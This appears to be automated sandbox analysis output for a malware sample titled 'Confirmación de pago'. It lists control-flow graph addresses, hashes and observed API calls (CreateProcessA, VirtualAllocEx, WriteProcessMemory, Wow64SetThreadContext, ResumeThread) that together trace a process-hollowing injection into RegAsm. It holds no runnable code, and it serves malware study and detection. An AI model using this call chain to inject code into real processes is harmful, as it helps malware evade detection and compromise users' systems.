98->115 99->82 108 2d69884-2d6988d call 2d68708 101->108 109 2d697d4-2d697e4 call 2d686f0 101->109 102->101 114 2d69892-2d698b2 108->114 113 2d697e9-2d697f6 109->113 116 2d69828-2d6982a 113->116 117 2d697f8-2d69826 call 2d686fc 113->117 118 2d698b4-2d698e6 call 2d615b0 114->118 119 2d698f1-2d69927 114->119 120 2d6965b-2d6968d call 2d615b0 115->120 121 2d69698 115->121 125 2d69830-2d69844 116->125 117->125 118->119 119->6 120->121 121->99 130 2d69846-2d69878 call 2d615b0 125->130 131 2d69883 125->131 130->131 131->108
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (
                                                • API String ID: 0-3887548279
                                                • Opcode ID: 4157badbd1aca02d687e5748cfc54edf3c0ebb9dc4ee9bffa456ec2de03030c7
                                                • Instruction ID: 438c303d7085e3388fc0a0035fa1b9bf313c7e8499767b5dff0142ab3aaed810
                                                • Opcode Fuzzy Hash: 4157badbd1aca02d687e5748cfc54edf3c0ebb9dc4ee9bffa456ec2de03030c7
                                                • Instruction Fuzzy Hash: 6352AF74E012288FDB64DF65C994BEDBBB2BB89301F1081EAD409A7395DB309E85DF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 140 2d6869c-2d69a40 143 2d69a42-2d69a4c 140->143 144 2d69a79-2d69a99 140->144 143->144 145 2d69a4e-2d69a50 143->145 151 2d69ad2-2d69b01 144->151 152 2d69a9b-2d69aa5 144->152 146 2d69a52-2d69a5c 145->146 147 2d69a73-2d69a76 145->147 149 2d69a60-2d69a6f 146->149 150 2d69a5e 146->150 147->144 149->149 153 2d69a71 149->153 150->149 160 2d69b03-2d69b0d 151->160 161 2d69b3a-2d69bf0 CreateProcessA 151->161 152->151 154 2d69aa7-2d69aa9 152->154 153->147 155 2d69acc-2d69acf 154->155 156 2d69aab-2d69ab5 154->156 155->151 158 2d69ab7 156->158 159 2d69ab9-2d69ac8 156->159 158->159 159->159 162 2d69aca 159->162 160->161 163 2d69b0f-2d69b11 160->163 171 2d69bf2-2d69bf8 161->171 172 2d69bf9-2d69c74 161->172 162->155 165 2d69b34-2d69b37 163->165 166 2d69b13-2d69b1d 163->166 165->161 167 2d69b21-2d69b30 166->167 168 2d69b1f 166->168 167->167 170 2d69b32 167->170 168->167 170->165 171->172 181 2d69c76-2d69c7a 172->181 182 2d69c84-2d69c88 172->182 181->182 183 2d69c7c-2d69c7f call 2d60b50 181->183 184 2d69c8a-2d69c8e 182->184 185 2d69c98-2d69c9c 182->185 183->182 184->185 187 2d69c90-2d69c93 call 2d60b50 184->187 188 2d69c9e-2d69ca2 185->188 189 2d69cac-2d69cb0 185->189 187->185 188->189 193 2d69ca4-2d69ca7 call 2d60b50 188->193 190 2d69cc2-2d69cc9 189->190 191 2d69cb2-2d69cb8 189->191 194 2d69ce0 190->194 195 2d69ccb-2d69cda 190->195 191->190 193->189 195->194
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,00000000,?), ref: 02D69BDD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 2e858c66af4d2455bd016e59779b8dc3b08e79d2720f1a3c12613fb4e0dd3061
                                                • Instruction ID: d1a20f79959667784cb20dec208031424c97886e862cd04a145b6401f61b1f57
                                                • Opcode Fuzzy Hash: 2e858c66af4d2455bd016e59779b8dc3b08e79d2720f1a3c12613fb4e0dd3061
                                                • Instruction Fuzzy Hash: 86913871D00619CFDB20CFA9C895BEEBBF2BB48314F1485AAE809A7340D7759985CF91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 198 2d686e4-2d6a021 201 2d6a023-2d6a02f 198->201 202 2d6a031-2d6a06a WriteProcessMemory 198->202 201->202 203 2d6a073-2d6a09b 202->203 204 2d6a06c-2d6a072 202->204 204->203
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 02D6A05D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: d435a2b26fcc3243844192d4b64be37157603a7e24cd22fc0930394b2927cc03
                                                • Instruction ID: ae11b84459aed8d9f14e3d7a70eb17d8a874c9bdc4c59527b13d5ac835a92a44
                                                • Opcode Fuzzy Hash: d435a2b26fcc3243844192d4b64be37157603a7e24cd22fc0930394b2927cc03
                                                • Instruction Fuzzy Hash: E421F5759003499FCB10DF9AC889BEEBBF5FB48310F50842AE958A7341D778A944CBA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 2d686c0-2d69ed4 ReadProcessMemory 210 2d69ed6-2d69edc 207->210 211 2d69edd-2d69f05 207->211 210->211
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 02D69EC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 9cfdc4e79d4a5e4aec1a87ab1e83c9dfb4193fe1a9ed9a96505cd6af5d48c7f5
                                                • Instruction ID: 4f311cedce721636f3f92eb78e37e62321c81ea506b3d849e9298900c4b6810c
                                                • Opcode Fuzzy Hash: 9cfdc4e79d4a5e4aec1a87ab1e83c9dfb4193fe1a9ed9a96505cd6af5d48c7f5
                                                • Instruction Fuzzy Hash: 0221E2B6901349DFCB10DF9AD984BDEBBF5FB48310F10842AE958A7351D379A944CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 223 2d686f0-2d69dcc 226 2d69dce-2d69dd6 223->226 227 2d69dd8-2d69e04 Wow64SetThreadContext 223->227 226->227 228 2d69e06-2d69e0c 227->228 229 2d69e0d-2d69e35 227->229 228->229
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(02FE95E4,00000000), ref: 02D69DF7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 03d67e47a09ca97dca8d8f0ad598e87d085ed5603ed24254574d34dc6e518f98
                                                • Instruction ID: e3daec0b733e29f4178e4cede1c93f3602b28857e154dc57a3d30dad13d39a71
                                                • Opcode Fuzzy Hash: 03d67e47a09ca97dca8d8f0ad598e87d085ed5603ed24254574d34dc6e518f98
                                                • Instruction Fuzzy Hash: 73213572D002199BCB10CF9AC5897EEFBF4BB48210F10816AD818B7341D378A904CFE0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 214 2d686a8-2d69dcc 217 2d69dce-2d69dd6 214->217 218 2d69dd8-2d69e04 Wow64SetThreadContext 214->218 217->218 219 2d69e06-2d69e0c 218->219 220 2d69e0d-2d69e35 218->220 219->220
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(02FE95E4,00000000), ref: 02D69DF7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 965250df859eb263beded7fe7e285b6f5080c33b6c26a3d0d09f6411d3c754f9
                                                • Instruction ID: d86aded25f941d28a1fdc0cfa882edfe47d17d7b9077680c599176721774e6de
                                                • Opcode Fuzzy Hash: 965250df859eb263beded7fe7e285b6f5080c33b6c26a3d0d09f6411d3c754f9
                                                • Instruction Fuzzy Hash: 1F213572D002199BCB10CF9AC5897EEFBF4BB48210F10812AD818B7341D378A904CFE0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 2d686d8-2d69f90 VirtualAllocEx 235 2d69f92-2d69f98 232->235 236 2d69f99-2d69fb6 232->236 235->236
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 02D69F83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 5b173898b74a73c6fa5b8c24381181786d760ebd4e6281f61269e10991a61070
                                                • Instruction ID: a4a86809607523bb1556c5780df1953a90bf015a9c13e1986eb2422c2c3b5d61
                                                • Opcode Fuzzy Hash: 5b173898b74a73c6fa5b8c24381181786d760ebd4e6281f61269e10991a61070
                                                • Instruction Fuzzy Hash: D11104B69043499FCB20DF9AC988BDEBBF5FB88310F108459E919A7351C775A944CFA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 239 2d68708-2d6a11c ResumeThread 242 2d6a125-2d6a142 239->242 243 2d6a11e-2d6a124 239->243 243->242
                                                APIs
                                                • ResumeThread.KERNEL32(02FE95E4), ref: 02D6A10F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: f120fe3eae7febda46c1de1d6e0810515b7ef8af2313164b0763e026177c355e
                                                • Instruction ID: b9eed4c10a68240eedbf65aff691c7906b209e4010d4ff57790d9af84b014f34
                                                • Opcode Fuzzy Hash: f120fe3eae7febda46c1de1d6e0810515b7ef8af2313164b0763e026177c355e
                                                • Instruction Fuzzy Hash: CC1125B19043498FDB20DF9AC588BDEFBF4EB48320F20845AD959A7300D778A944CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 384 120d76d-120d78d 385 120d7dd-120d7e5 384->385 386 120d78f-120d79a 384->386 385->386 387 120d7d2-120d7d9 386->387 388 120d79c-120d7aa 386->388 387->388 392 120d7db 387->392 391 120d7b0 388->391 393 120d7b3-120d7bb 391->393 392->393 394 120d7cb-120d7d0 393->394 395 120d7bd-120d7c5 393->395 394->395
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460443786.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_120d000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c685e5efd296e7ab85ebcc8b44d534ec58c22283ad7a62f5ca645b37632b38ee
                                                • Instruction ID: 3635c077e57c3f188c5be0004f614c95b40b7531bd21c55a6978523f8e95cd68
                                                • Opcode Fuzzy Hash: c685e5efd296e7ab85ebcc8b44d534ec58c22283ad7a62f5ca645b37632b38ee
                                                • Instruction Fuzzy Hash: DE012B3101A3889BF7264AD5CC80767FBD8EF41634F14C52DEE090A6D3C3789840CA72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460443786.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_120d000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b3712d0d135c7cd5c31fbaac5cee24e88b30ec4c9804220bb16a3c3723e8e9a
                                                • Instruction ID: 7baf059c553b0aefcc8eb9316d854ca4b735d09b5dfe18debaf3615cd5303997
                                                • Opcode Fuzzy Hash: 3b3712d0d135c7cd5c31fbaac5cee24e88b30ec4c9804220bb16a3c3723e8e9a
                                                • Instruction Fuzzy Hash: 9EF0C2324093889FEB258A49D884B63FFE8EB41624F18C55AEE084B2D7C2789840CB71
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L$z
                                                • API String ID: 0-3355038770
                                                • Opcode ID: fa9efc7a6f230bd0b806e837f838d589a4f9da3140df218538d2cbfadf471bb2
                                                • Instruction ID: 24de6b7f186988fe36214ee43eb0489909c2b29e8841f1cc70b3e99c2628bceb
                                                • Opcode Fuzzy Hash: fa9efc7a6f230bd0b806e837f838d589a4f9da3140df218538d2cbfadf471bb2
                                                • Instruction Fuzzy Hash: E14140B1E016588BEB5CCF6BCD4479EFAF7AFC9200F04C1BA850DAA255EB7049858E15
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b67c8b97ae3be82dab9b7452c30736b5cb43175434dacbb5b1207022f7ef788e
                                                • Instruction ID: 4ddd48f1927373f132f86aad3c02194a120441aa2031ccab0eb2554e6835e6e8
                                                • Opcode Fuzzy Hash: b67c8b97ae3be82dab9b7452c30736b5cb43175434dacbb5b1207022f7ef788e
                                                • Instruction Fuzzy Hash: C3515E749012098FDB99DFB9E8907AE7BF6BBC9700F00C529C0159F2AADB705809EF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41d27f82e5a26dc462d6b8ab7704c1db84be693fcb8a01cbe8fd4a0e9004f4ef
                                                • Instruction ID: cb2e1e3efcae339b6a078c7f56ae88f94cc36cc46a7ef6bdb63a2a54502cbe7d
                                                • Opcode Fuzzy Hash: 41d27f82e5a26dc462d6b8ab7704c1db84be693fcb8a01cbe8fd4a0e9004f4ef
                                                • Instruction Fuzzy Hash: DD516F749016098FDB59DFB9E8907AE7BF6BBC9700F00C529C0169B3AADB705809EF51

                                                Execution Graph

                                                Execution Coverage:12.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:4
                                                Total number of Limit Nodes:0
                                                execution_graph 10433 30dfdba 10434 30dfe02 10433->10434 10436 30dfe09 10433->10436 10435 30dfe5a CallWindowProcW 10434->10435 10434->10436 10435->10436
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 030DFE81
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2696623087.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_30d0000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: b6244061b5df787f00db60ab66b4cba193b21c5a063ef2052a093824331a7f6f
                                                • Instruction ID: 723dfb777bb543a72f4770c7b674a8c1c4303766a31bdcf8fd6d8a3bd4f7f4ad
                                                • Opcode Fuzzy Hash: b6244061b5df787f00db60ab66b4cba193b21c5a063ef2052a093824331a7f6f
                                                • Instruction Fuzzy Hash: 78423734A01306CFDB64CB68C584B9DBBF6EB49314F58C4A9D40AAB365D735EC81CB51
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2696230347.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_148d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eac3d5fba33a8dbc56c242b603d4641323f9af9afa5dd129d65a22d11228401e
                                                • Instruction ID: 29813f0d48f14f966396b57da1cea5a0b6f0392039c0c8af0c3678bdbffc339b
                                                • Opcode Fuzzy Hash: eac3d5fba33a8dbc56c242b603d4641323f9af9afa5dd129d65a22d11228401e
                                                • Instruction Fuzzy Hash: A32137B1905304DFDB15EF54D9C0B1ABB61FB85318F24C56ED80A4B3A6C33AD847CA62
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2696230347.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_148d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 781e332f723c96c7689550f51fa5439940b6e95f0cbf444f2339fbf5d3ccf632
                                                • Instruction ID: f7ae4521cf60b7d3e82d5c1046c790a91e61393bf0bd788180dd450169f2f82d
                                                • Opcode Fuzzy Hash: 781e332f723c96c7689550f51fa5439940b6e95f0cbf444f2339fbf5d3ccf632
                                                • Instruction Fuzzy Hash: 5221687140A3C49FCB03DB64D990715BF71AB47214F29C5DBC8898F2A7C23A984ACB62